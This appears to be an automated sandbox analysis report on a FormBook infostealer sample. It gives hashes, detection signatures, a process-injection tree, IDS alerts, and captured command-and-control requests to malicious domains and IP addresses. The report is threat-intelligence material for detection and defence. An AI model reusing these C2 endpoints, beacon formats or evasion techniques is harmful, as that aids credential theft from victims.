Edit tour

Windows Analysis Report
tfWjjV1LdT.exe

Overview

General Information

Sample name:	tfWjjV1LdT.exe renamed because original name is a hash value
Original sample name:	bd2476bf4c51a0a98316cf0efcf28cdda8e6cdad976f22a6a390e57867a7c76c.exe
Analysis ID:	1588375
MD5:	c3689a08e5e324cde3000e0da0261633
SHA1:	f937a0c9e37aeeb64b71799637ce45ed8cd27d1c
SHA256:	bd2476bf4c51a0a98316cf0efcf28cdda8e6cdad976f22a6a390e57867a7c76c
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

tfWjjV1LdT.exe (PID: 4852 cmdline: "C:\Users\user\Desktop\tfWjjV1LdT.exe" MD5: C3689A08E5E324CDE3000E0DA0261633)

svchost.exe (PID: 892 cmdline: "C:\Users\user\Desktop\tfWjjV1LdT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

ldZEVEbpOrO.exe (PID: 4444 cmdline: "C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

mobsync.exe (PID: 6768 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)

ldZEVEbpOrO.exe (PID: 3668 cmdline: "C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6448 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\tfWjjV1LdT.exe", CommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", ParentImage: C:\Users\user\Desktop\tfWjjV1LdT.exe, ParentProcessId: 4852, ParentProcessName: tfWjjV1LdT.exe, ProcessCommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", ProcessId: 892, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\tfWjjV1LdT.exe", CommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", ParentImage: C:\Users\user\Desktop\tfWjjV1LdT.exe, ParentProcessId: 4852, ParentProcessName: tfWjjV1LdT.exe, ProcessCommandLine: "C:\Users\user\Desktop\tfWjjV1LdT.exe", ProcessId: 892, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:40:11.996083+0100	2856318	1	A Network Trojan was detected	192.168.2.5	49954	134.0.14.158	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXm	Avira URL Cloud: Label: malware
Source: http://www.aballanet.cat/6xrr/	Avira URL Cloud: Label: malware
Source: http://aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: tfWjjV1LdT.exe	Virustotal: Detection: 54%			Perma Link
Source: tfWjjV1LdT.exe	ReversingLabs: Detection: 55%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: tfWjjV1LdT.exe

Joe Sandbox ML: detected

Source: tfWjjV1LdT.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.2272782502.000000000322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272687879.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272797375.0000000003242000.00000004.00000020.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896193595.000000000168E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ldZEVEbpOrO.exe, 00000004.00000000.2229278748.000000000090E000.00000002.00000001.01000000.00000005.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382349293.000000000090E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: tfWjjV1LdT.exe, 00000000.00000003.2085455684.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tfWjjV1LdT.exe, 00000000.00000003.2085591228.0000000003730000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212680424.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210467836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2311789214.0000000004B48000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2309031499.000000000499E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: tfWjjV1LdT.exe, 00000000.00000003.2085455684.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tfWjjV1LdT.exe, 00000000.00000003.2085591228.0000000003730000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2212680424.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210467836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2311789214.0000000004B48000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2309031499.000000000499E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.2272782502.000000000322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272687879.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272797375.0000000003242000.00000004.00000020.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896193595.000000000168E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: mobsync.exe, 00000005.00000002.3895710577.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3897126671.000000000531C000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002DC3C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: mobsync.exe, 00000005.00000002.3895710577.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3897126671.000000000531C000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002DC3C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006F445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_006F445A
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FC6D1 FindFirstFileW,FindClose,	0_2_006FC6D1
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_006FC75C
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006FEF95
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006FF0F2
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006FF3F3
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006F37EF
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006F3B12
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006FBCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:49954 -> 134.0.14.158:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.izmirescortg.xyz
Source:	DNS query: www.logidant.xyz

Source: Joe Sandbox View	IP Address: 45.141.156.114 45.141.156.114
Source: Joe Sandbox View	IP Address: 27.124.4.246 27.124.4.246
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: YURTEH-ASUA YURTEH-ASUA

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_007022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_007022EE

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 00:40:23 GMTserver: Apacheset-cookie: __tad=1736556023.3953434; expires=Tue, 09-Jan-2035 00:40:23 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 00:40:25 GMTserver: Apacheset-cookie: __tad=1736556025.8120462; expires=Tue, 09-Jan-2035 00:40:25 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 00:40:28 GMTserver: Apacheset-cookie: __tad=1736556028.1834882; expires=Tue, 09-Jan-2035 00:40:28 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Source: global traffic	HTTP traffic detected: GET /lnl7/?KBEhCJ=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&Kdr=RN-HMNoXj6pXm HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.izmirescortg.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXm HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.aballanet.catUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
